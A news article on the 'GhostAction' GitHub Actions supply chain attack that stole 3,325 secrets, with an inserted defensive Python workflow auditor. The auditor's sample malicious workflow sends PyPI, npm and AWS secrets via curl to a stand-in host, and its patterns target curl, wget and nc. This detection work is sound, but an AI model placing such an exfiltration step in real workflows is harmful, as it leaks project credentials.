- GhostAction attack stole 3,325 secrets from 327 GitHub accounts
- GitGuardian helped shut it down and alerted the affected projects
- A separate npm attack reached 2,000 accounts but was not related
Thousands of secrets, including PyPI and AWS keys, GitHub tokens and more, were recently stolen in a supply chain attack on GitHub dubbed 'GhostAction'. The attack was spotted by GitGuardian security researchers, who notified GitHub and helped shut it down.
GitGuardian researchers first saw the attack when they were alerted to a compromised commit in a GitHub project called FastUUID. The project's maintainer account had evidently been compromised and used to push a malicious GitHub Actions workflow named "Add Github Actions Security workflow".
It was designed to steal secrets, including PyPI, npm, DockerHub, GitHub, Cloudflare and AWS credentials.
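As an added defender-side illustration (not code from the report or from GitGuardian), the check below scans workflow text for the pattern described above: several `${{ secrets.* }}` references wired into a run step that sends data to a host outside GitHub. The two sample workflows and the allow-list of trusted hosts are constructed for this example.

```python
import re

# Constructed sample workflows (not from the GitGuardian report): one that wires
# several repository secrets into a step posting them off-platform, and one plain CI job.
SUSPICIOUS_WORKFLOW = """\
name: Security workflow
on: push
jobs:
  security:
    runs-on: ubuntu-latest
    steps:
      - name: collect
        env:
          PYPI_TOKEN: ${{ secrets.PYPI_API_TOKEN }}
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
          AWS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        run: curl -s -X POST -d "$PYPI_TOKEN,$NPM_TOKEN,$AWS_KEY" https://example.invalid/collect
"""
BENIGN_WORKFLOW = """\
name: CI
on: push
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: pip install -e . && pytest
      - env:
          TWINE_PASSWORD: ${{ secrets.PYPI_API_TOKEN }}
        run: twine upload dist/*
"""
# ${{ secrets.NAME }} references, and run lines pointing a network tool at a URL (host captured).
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.(\w+)\s*\}\}")
NET_TOOL_URL = re.compile(r"\b(curl|wget|nc)\b[^\n]*?https?://([^/\s\"']+)", re.I)
TRUSTED_HOSTS = {"github.com", "api.github.com", "objects.githubusercontent.com"}

def audit_workflow(text, max_secrets=2):
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    secrets = sorted(set(SECRET_REF.findall(text)))
    if len(secrets) > max_secrets:
        findings.append(f"references {len(secrets)} secrets: {', '.join(secrets)}")
    untrusted = [(t, h) for t, h in NET_TOOL_URL.findall(text) if h.lower() not in TRUSTED_HOSTS]
    for tool, host in untrusted:
        findings.append(f"run step uses {tool} to contact untrusted host {host}")
    if secrets and untrusted:
        findings.append("secrets are exposed to a job that talks to an untrusted host")
    return findings
```

Run it over every file under `.github/workflows/` in a new commit; a non-empty result on a workflow that did not previously exist is the kind of change worth a manual look before secrets are ever mapped into it.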
The exfiltration server goes offline
The researchers reported their findings to PyPI, and the project was moved to a read-only state. Shortly afterwards, the legitimate account owner regained access and reverted the malicious commit.
However, since the attacker did not react over the following days, GitGuardian researchers concluded that they were probably busy compromising other projects, and they were right. A deeper investigation uncovered 327 compromised accounts, resulting in 3,325 leaked secrets.
"After our impact assessment, we began alerting the affected users and projects by opening issues in each compromised repository," GitGuardian explained in its report. "Among the 817 affected repositories, 100 had already reverted the malicious changes. We successfully created issues for 573 of the remaining 717 projects; the others had been deleted or had issues disabled."
Shortly after GhostAction was discovered, the server to which the secrets were exfiltrated stopped resolving, meaning the campaign was successfully disrupted.
GitGuardian was also alerted to S1ngularity, an npm supply chain attack that compromised more than 2,000 GitHub accounts and resulted in thousands of account tokens and repository secrets being leaked. Since both attacks occurred at roughly the same time, the researchers speculated that they might have been part of the same campaign. However, the investigation determined that they were two separate incidents:
"From this initial research, we did not find any intersection between these users and the recent victims of the S1ngularity attack campaign. It is likely that these two incidents are not related," they concluded.
Via BleepingComputer